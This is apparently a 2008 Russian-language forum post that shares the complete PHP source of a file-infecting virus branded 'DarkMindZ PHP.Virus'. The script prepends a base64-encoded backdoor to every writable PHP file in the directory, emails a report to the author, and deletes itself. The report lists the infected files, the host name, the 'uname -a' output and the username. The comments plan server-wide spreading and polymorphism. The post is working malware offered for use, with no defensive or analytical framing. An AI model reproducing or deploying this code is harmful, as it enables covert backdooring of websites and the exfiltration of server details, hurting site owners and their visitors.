14.02.2008, 04:49
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами:
10248806
Репутация:
2371
|
|
PHP код:
<?php // DarkMindZ.com
######################################
# [ DarkMindZ PHP.Virus v1.5 ] #
# [ RoMeO ] #
######################################
set_time_limit(0);
ignore_user_abort(1);
# root@darkmindz.com~ cat /home/pr0jects/virus/intro
# DMZ PHP.Virus, very simple PHP virus, that would do the following:
# |1| Look for all PHP files in directory.
# |2| Check if infected.
# |3| Infect with your backdoor.
# |4| Log all infected files, and optional mail them to you.
# root@darkmindz.com~ exit
# [ To-Do ] #
# Mass infector, infect other users on server.
# Better Reports, some system info reports too.
# Spreading, by RFI dorks.
# Polymorphism
#[x] Change user-agent used, 2 backdoors, `include and a CMD exec`. - done a better job here, one backdoor, includes all that :]
######## [ CONFIG ] ########
$backdoor =''; # your backdoor here - Base64 encoded PLEASE
$agent = 'darkmindz.com_b4ckd00r'; # your agent here.
##
$log_email = 1; # Send log to email?
$email = 'romeo.haxxor@gmail.com'; # Email to send logs to.
##
$log_report = 0; # Write a log?
$filename = '__log.html'; # name of log.
##
$delete_me = 1; # Delete me after we are done? - Recommended. :]
##
echo '<title>DarkMindZ.com - Think Dark - The Backdoor.</title><center><strong> [ <a href="http://www.darkmindz.com">DarkMindZ.com || Mass Backdoor Tool || By RoMeO</a> ]</strong></center><br>';
$dir = opendir('.');
$site=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
echo '<strong>[-] Infecting : ' . $site . '</strong><br>';
while ($file = readdir($dir))
{
if (strstr($file, '.php') && is_writeable($file))
{
$victim = fopen($file, 'r+');
$victim_read = fread($victim, filesize($file));
if (!strstr($victim_read, 'DarkMindZ.com'))
{
fclose($victim);
unlink($file);
$new = fopen($file, 'a+');
$new_write = fwrite($new, base64_decode($backdoor) . $victim_read);
fclose($new);
echo '[x] Infected: ' . getcwd() .'/'. $file . '<br>';
if($log_email) { $log = fopen('__tmp', 'a+'); fwrite($log, '[x] File: ' . getcwd() .'/'. $file . '
'); fclose($log); }
if($log_report) { $x = fopen($filename, 'a+'); fwrite($x, '[x] File: ' . getcwd() .'/'. $file . "\n"); fclose($x); }
}
}
}
closedir($dir);
if($log_email) {
$fromname = "DarkMindZ Backdoor";
$fromaddress = "root@darkmindz.com";
$eol="\n";
$headers = "From: ".$fromname."<".$fromaddress.">".$eol;
$headers .= "Reply-To: ".$fromname."<".$fromaddress.">".$eol;
$headers .= "Return-Path: ".$fromname."<".$fromaddress.">".$eol;
$headers .= "Message-ID: <".time()."-".$fromaddress.">".$eol;
$headers .= "X-Mailer: PHP v".phpversion().$eol;
$headers .= 'MIME-Version: 1.0'.$eol;
$headers .= "Content-type: text/html; charset=iso-8859-1".$eol.$eol;
$report = file_get_contents('__tmp');
$dir = getcwd();
$part = explode('/', $dir);
$username = $part[1];
$uname = @system('uname -a');
$report .= '
###########################################
Backdoor Report | | DarkMindZ.com
###########################################
Target: '.$site.'
Uname: '.$uname.'
Username: '.$username.'
Agent: '.$agent.'
###########################################
';
mail($email, "DarkMindZ Backdoor", '
' .$report, $headers); unlink('__tmp'); echo '<br />[x] Email Report Sent!';}
if($delete_me) { unlink(__file__); }
# done, kthxbai! next target pl0x;]
exit; # if we are in a RFI, we dont want to show other content, right?
?>
|
|
|